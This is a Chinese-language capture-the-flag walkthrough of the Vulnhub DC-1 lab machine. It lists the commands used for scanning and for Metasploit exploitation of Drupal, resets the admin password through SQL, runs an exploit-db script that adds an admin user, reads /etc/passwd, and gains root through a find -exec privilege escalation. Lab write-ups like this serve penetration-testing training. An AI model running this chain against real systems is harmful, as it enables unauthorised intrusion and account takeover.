Vulnhub DC-1 靶机渗透实战

靶机下载地址：https://www.vulnhub.com/entry/dc-1-1,292/

攻击机：kali

下载好靶机后直接用VM打开

准备就绪，开始操作

首先进行局域网内主机发现

命令:arp-scan -l

发现目标主机

开始信息搜集

nmap闪亮登场

用nmap扫描目标主机开放端口

命令：nmap -sV -p- 192.168.119.145

发现目标开放80端口，登录访问

网站使用drupal cms管理系统

直接上msf，看看有没有漏洞

命令：search drupal

选择2018年的漏洞尝试

查看payload参数，其中yes为必填

命令：show options

设置靶机地址192.168.119.145

 

准备就绪，开始冲击

 

成功反弹shell成功！

 

再来一波搜集信息

 

进入shell模式

但他不是交互式shell，我们可以用python反弹交互式shell

命令：python -c 'import pty;pty.spawn("/bin/bash")'

 

查看当前目录下文件，发现第一个flag:flag1.txt

 

flag1.txt显示去配置文件查看信息，说走咋就走

查看settings.php

找到flag2并且发现数据库信息

 

胜利的方程式已经决定了

冲击数据库

命令：mysql -u dbuser -p

 

发现user表，并进入user表内寻找用户信息

发现用户密码加密。

 

查看drupal版本信息

drupal通常是用MD5加密，但是7.0以后drupal采用hash加密。这里是加盐的MD5码，没办法直接破解。

 

壮志未酬，难道就要倒在这里了吗？

NONONO

来人啊，找度娘

 

No1:drupal7重置密码方法：

drupal自带password-hash.sh这个功能

命令：php ./scripts/password-hash.sh newpassword(如123456)

获得加密密码，冲进数据库更改用户密码

命令：update users set pass='$S$DpF/YLnHLrX3TCWbm0bp0LcRf2T7IlRfpJDnB3QqQOHH2wmFg4gI' where name='admin';

 

No2:用drupal可利用漏洞，添加admin用户：

在msf中搜索可利用漏洞

命令：searchsploit drupal

 

命令：python /usr/share/exploitdb/exploits/php/webapps/34992.py -t http://192.168.119.145 -u admin1 -p admin1

添加用户成功

 

 

GOGOGO 登录网站

在content里找到flag3内容

提示用find+perms+exec来提权

 

根据flag3提示提权，我们查看用户信息列表来获取用户权限信息

命令：cat /etc/passwd

发现了flag4这个用户，并且知道flag4的主目录为home目录

进入/home/flag4目录

得到flag4.txt内容，提示最后的flag在root目录下

我们用find命令查看root目录下的文件

命令：find /root

非常激动的找到最后的flag文件，但是咋们没有权限，无法打开他

离成功仅一步之遥，岂能放弃，提权走起

从flag3提示可知是用find+perms+exec 命令来提权

命令：touch test

　　　　find test -exec '/bin/bash' \;

再去访问/root目录

至此已找齐所有flag，任务完成，继续摸鱼